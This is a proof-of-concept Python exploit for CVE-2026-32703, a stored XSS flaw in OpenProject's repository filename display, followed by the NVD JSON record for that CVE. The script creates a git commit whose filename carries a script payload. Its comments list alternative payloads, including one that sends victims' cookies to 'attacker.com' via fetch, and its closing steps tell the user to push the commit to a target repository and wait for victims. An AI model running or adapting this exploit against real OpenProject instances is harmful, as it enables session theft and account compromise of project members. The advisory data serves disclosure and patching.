CVE-2026-32703

# CVE-2026-32703 PoC - OpenProject Stored XSS via Repository Filename # Requires: Git, access to push to OpenProject repository import subprocess import sys def exploit(): """ This PoC demonstrates how an attacker with push access can inject malicious JavaScript through a specially crafted filename in a Git commit. """ # Malicious filename containing XSS payload malicious_filename = '<script>alert(String.fromCharCode(88,83,83))</script>.txt' # Alternative payloads that could be used: # <img src=x onerror=alert(document.cookie)> - Steal cookies # <svg/onload=fetch('https://attacker.com/?c='+document.cookie)> - Exfiltrate data # <iframe src="javascript:alert(document.domain)"> - Domain disclosure commands = [ # Initialize a git repo for testing (in real scenario, clone existing repo) "git init", "git config user.email '[email protected]'", "git config user.name 'Attacker'", # Create the malicious file with XSS payload in filename f"touch '{malicious_filename}'", f"git add '{malicious_filename}'", # Commit the malicious file "git commit -m 'Add documentation file'", # Display the malicious commit "git log --oneline -1", ] print("[*] CVE-2026-32703 OpenProject Stored XSS PoC") print("[*] This PoC creates a commit with XSS payload in filename") print(f"[*] Malicious filename: {malicious_filename}") print("[*] When this file is displayed in OpenProject repositories page,") print("[*] the script tag will execute in victim's browser.") for cmd in commands: print(f"\n[+] Executing: {cmd}") result = subprocess.run(cmd, shell=True, capture_output=True, text=True) if result.stdout: print(result.stdout) if result.stderr: print(result.stderr, file=sys.stderr) print("\n[!] In real attack scenario:") print("[!] 1. Push this commit to target OpenProject repository") print("[!] 2. Wait for victims to view the repository page") print("[!] 3. XSS payload executes in victim's browser") if __name__ == '__main__': exploit()

{"cve": {"id": "CVE-2026-32703", "sourceIdentifier": "[email protected]", "published": "2026-03-18T22:16:24.517", "lastModified": "2026-03-19T19:23:00.593", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenProject is an open-source, web-based project management software. In versions prior to 16.6.9, 17.0.6, 17.1.3, and 17.2.1, the Repositories module did not properly escape filenames displayed from repositories. This allowed an attacker with push access into the repository to create commits with filenames that included HTML code that was injected in the page without proper sanitation. This allowed a persisted XSS attack against all members of this project that accessed the repositories page to display a changeset where the maliciously crafted file was deleted. Versions 16.6.9, 17.0.6, 17.1.3, and 17.2.1 fix the issue."}, {"lang": "es", "value": "OpenProject es un software de gestión de proyectos de código abierto y basado en la web. En versiones anteriores a la 16.6.9, 17.0.6, 17.1.3 y 17.2.1, el módulo de Repositorios no escapaba correctamente los nombres de archivo mostrados desde los repositorios. Esto permitía a un atacante con acceso de push al repositorio crear commits con nombres de archivo que incluían código HTML que se inyectaba en la página sin la sanitización adecuada. Esto permitía un ataque XSS persistente contra todos los miembros de este proyecto que accedían a la página de repositorios para mostrar un changeset donde el archivo creado maliciosamente había sido eliminado. Las versiones 16.6.9, 17.0.6, 17.1.3 y 17.2.1 corrigen el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.6.9", "matchCriteriaId": "7FD9C4C4-FFDC-4EE6-AAB2-901C1C6CB6BE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.0.6", "matchCriteriaId": "E1003FD4-BC22-4AB4-91B4-EB63FFF41C2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.1.0", "versionEndExcluding": "17.1.3", "matchCriteriaId": "86B90D5D-1A3D-4524-A3CC-F7B7274A4E26"}, {"vulnerable": true, "criteria": "cpe:2.3:a:openproject:openproject:17.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2D1F069-BA78-4F8A-8FF9-DAE63BFB39CF"}]}]}], "references": [{"url": "https://github.com/opf/openproject/security/advisories/GHSA-p423-72h4-fjvp", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}